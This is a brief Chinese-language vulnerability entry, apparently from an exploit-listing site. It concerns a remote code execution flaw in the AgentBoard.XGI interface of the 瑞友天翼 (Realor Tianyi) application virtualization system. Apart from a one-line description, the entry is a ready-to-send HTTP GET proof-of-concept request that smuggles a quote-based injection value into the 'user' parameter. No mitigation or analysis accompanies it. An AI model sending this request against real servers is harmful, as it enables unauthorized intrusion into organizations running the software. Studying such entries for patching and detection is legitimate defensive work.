瑞友天翼应用虚拟化系统 AgentBoard.XGI 远程代码执行漏洞

日期: 2024-04-10 | 影响软件: 瑞友天翼应用虚拟化系统 | POC: 已公开

漏洞描述

瑞友天翼应用虚拟化系统 AgentBoard.XGI 接口存在远程代码执行漏洞.

PoC代码

GET /AgentBoard.XGI?cmd=UserLogin&user='||'1 HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

相关漏洞推荐